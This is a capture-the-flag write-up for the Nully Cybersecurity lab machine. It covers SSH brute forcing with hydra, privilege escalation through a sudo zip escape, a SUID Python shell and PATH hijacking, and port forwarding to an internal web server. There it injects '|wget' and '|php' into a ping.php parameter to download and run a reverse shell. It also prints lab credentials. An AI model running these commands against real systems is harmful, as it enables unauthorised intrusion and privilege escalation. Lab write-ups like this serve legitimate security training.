Last updated: 15 Apr 24 09:31:26 (UTC)

Write-Up NullyCybersecurityCTF

Nully-Cybersecurity

Introduction

By Lawcky 06/01/24

Story:

You are a Professional White Hat. Small company Nully Cybersecurity hired you to conduct a security test of their internal corporate systems.

Difficulty : easy-medium

Additionnal info :

Name: Nully Cybersecurity: 1
Release date: 6 Sep 2020
Author: laf3r
Series: Nully Cybersecurity

|NOTE| if you want to see all the scans I wont copy them here as they would be way too voluminous, click here to see them

Rules

fe4cd5f4d4aca0df53a1562a8f68ab49.png

In this write-up

  • telnet for pop3
  • hydra
  • ffuf
  • zip (SUID exploit)
  • ssh (port forwarding)
  • rce using php file
  • writable path
  • ftp
  • pycrack

Write-UP Mail-Server

first approach

e5515a35910063a15d585b1fb3d2fc4f.png

hydra

sudo hydra -l bob -P nullycyber.dic ssh://192.168.1.35:2222/

44d7fa3f845e615ee08ef3ffc1841f40.png

bob:bobby1985

c6d3fcac258d5be94b744b380fa0cacd.png

10c7ab14fcfb0f2acfbd02293964b765.png

for a faster enumeration we execute linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

nothing special stands out

Privilege escalation

sudo -l

6c9ac5d3c09d6ce29f495733fb4e6a4a.png

this script can be ran as my2user, we can modify it by adding

/bin/bash to get the shell of my2user

cd64615fea8ff7d111fe52de377c0a2d.png

from here

c0b6b342b889766e98981db75c61d7d5.png

we can use this to get root access

TF=$(mktemp -u)

sudo zip $TF /etc/hosts -T -TT 'sh #'

cb32e3d209027ee2053735e7d0ff6a95.png

f26c38255e8aad8528cb6dc1543b210a.png

Write-Up Web Server

the ip of the webserver is 172.17.0.3 (localhost)

curl 172.17.0.3

2f34d8fc49cfccc3bec887481f932249.png

the man in charge of the website seems to be named oliver

Port Forwarding

in order to make things easier we will create a port forward using ssh from our machine to the web server that’ll pass through the mail server

ssh -L 127.0.0.1:8088:172.17.0.2:80 bob@192.168.1.84 -p 2222

b68992238e2b4f501e1f7ce2f639a29b.png

it worked !

FUZZING

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://127.0.0.1:8088/FUZZ -fc 403

7877e6e07dab31246106744ab21b799b.png

RCE

079b25666405eb63b1f84788a5dcafeb.png
there is a remote code execution
we upload a reverse shell (pentest monkey)

python -m http.server 8000

then we execute the urls

http://127.0.0.1:8088/ping/ping.php?host=172.17.0.1|wget%20http://172.17.0.5/monkey.php

http://127.0.0.1:8088/ping/ping.php?host=172.17.0.1|php%20monkey.php

we have a reverse shell

Privilege Escalation

ef1fe791bf69543f32ee04352457a28e.png

find / -perm -u=s -type f 2>/dev/null

using the Python SUID

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

we get a hold of oscar’s file and find this password on his desktop

oscar:H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o

54b58d9f949e274b8aed13b36f7f7ec8.png

we find this executable owned by root

d563fc6f0248cb21c21e32558c763f49.png

this script calls the date command

Writable Path

we rewrite the path to be able to ‘replace’ the date command for a script that we’ll manually write

export PATH=/tmp:$PATH

add tmp to the path

we create a script called /tmp/date with inside :
/bin/bash

and we run the current-date executable

8ff1c76547a1f93aea4abaded69235a9.png

got root

8a128ccf70f3f224233503a562844bc1.png

7afc7a60ac389f8d5c6f8f7d0ec645da

got second flag

Write-Up Database

FTP

we successfully connect as anonymous where there is many hidden file, one beeing a hidden zip file with a password

PyCrack

efce1c8eb57503e4bca2f51c80e5b16d.png

012cacee57edee323b97e7ab199733f2.png

donald:HBRLoCZ0b9NEgh8vsECS

Privilege Escalation

20c1122293dccb4ef2000c595ecce58c.png

Using DB exploit

adfd0cc69514495afbd7b33521e55477.png

1610538a121cf5197146cccec88d5b90.png

6cb25d4789cdd7fa1624e6356e0d825b

third flag found

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.